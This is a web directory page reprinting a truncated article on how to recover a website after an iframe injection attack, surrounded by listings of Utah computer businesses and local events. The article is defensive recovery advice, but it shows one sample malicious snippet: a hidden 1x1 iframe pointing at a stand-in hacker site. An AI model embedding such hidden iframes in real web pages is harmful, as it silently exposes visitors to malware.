IFrame Injection Attack: Cross Site Scripting (XSS) Tutorials Spanish Fork UT

IFrame Injection Attack is considered one of the most common and most basic cross site scripting (XSS) attacks. If you have recently got an iframe attack to your website, do not panic. Here are a few things that you can do immediately after you discovered that your website has been a victim of an iframe injection attack.
Nebco Technical Institute
(801) 754-3236
476 S 500 East
Santaquin, UT
Geek Squad
(800) 489-0623
309 E University PkwyE 200
OremUKEE, UT
K Two Computers
(435) 722-1548
90 N 200 E
Roosevelt, UT
Solutions Guy
(435) 215-4065
Saint George, UT
SpectraSoft, Inc.
(801) 561-0087
West Jordan, UT
Atvantage Business Solutions
(801) 225-3800
254 N Orem Boulevard
Orem, UT
IT Services Plus LLC
(801) 467-4908
Salt Lake City, UT
Fast-Teks On-Site Computer Services
(435) 654-4811
158 Millbrook Circle
Heber City, UT
Radius LLC
(801) 682-1260
2520 W 4700 S
Taylorsville, UT
United Computer Service
(435) 755-3456
485 N Main Street
Logan, UT
Data Provided by:
  
Provided By:

IFrame Injection Attack: Cross Site Scripting (XSS) Tutorials

IFrame Injection Attack is most common and most basic cross site scripting (XSS) attacks
Written by Vijay Patil

IFrame Injection Attack is considered one of the most common and most basic cross site scripting (XSS) attacks. If you have recently got an iframe attack to your website, do not panic. Here are a few things that you can do immediately after you discovered that your website has been a victim of an iframe injection attack.

<iframe src="http://www.example-hacker-site.com/inject/?s=some-parameters" width="1" height="1" style="visibility: hidden"></iframe>
An example of a malicious IFRAME injection code

1. Take your website down for a certain period

It is recommended to take the website down as you do not want to be distributing malware or virus from your website to your visitors. The website should be offline while you are recovering the site.

2. Change all the passwords

Although this may seem like a simple step, many people, including myself, often fail to change all the passwords immediately after an attack has been discovered. You need to change all the passwords associated with the website; which include ftp passwords, ssh passwords, account passwords, database passwords, admin passwords and so on.

3. Take a copy of the affected website for further analysis

You may want to do a further analysis on the attack and might need to refer to the exact injection source code in the future. Take a copy of the affected website in a compressed format, eg: zip or gzip and store it in an quarantine area for later reference. Note that it is not advisable to keep the affected files on the server.

4. Replace the entire site with a clean backup copy

Do not rely on your hosting provider for a backup copy of your site. Many hosting providers say they do an automatic backup every night, however, it is more reliable if you have other backup solutions for your website.

5. Test the website and reopen

This is to make sure that the website is reverted to its clean, original version. Once you are happy with the result, you can reopen the website to the public.

6. Analyse how the attack was originated

In order to ensure that the same attack does not happen again, you will need to do a full analysis of the attack and how it was originated. Was it because of a security hole in your application? Was it caused by a weak file permission? Or is your server affected with some virus that injects these code into your website at regular interval? You will need to understand how it happens in order to prevent it in the future. And when necessary, obtain an expert advice.

7. Perform appropriate security measures based on the analysis

Although you may have recovered your website, it does not mean your website will not be attacked again. If the same security hole still exists, it is probably very likely that the website will be attac...
Click here to read the rest of this article from Computer User

Related Local Events
Grades Available : Spring 2013 Academic Deadline
Dates: 5/14/2013 - 5/16/2013
Location: University of Utah
Salt Lake City, UT
View Details
Wastach Gem Society Gem - Mineral - Fossil Show
Dates: 5/17/2013 - 5/17/2013
Location: Salt Lake County Equestrian Park and Events Center
South Jordan, UT
View Details
Night for Sight
Dates: 6/22/2013 - 6/24/2013
Location: University of Utah
Salt Lake City, UT
View Details
University Hospital Foundation Ebony & Ivory Gala
Dates: 8/24/2013 - 8/24/2013
Location: University of Utah
Salt Lake City, UT
View Details
2013 Benning Society Special Lecture in Medicine featuring Harold Varmus, MD
Dates: 9/19/2013 - 9/19/2013
Location: University of Utah
Salt Lake City, UT
View Details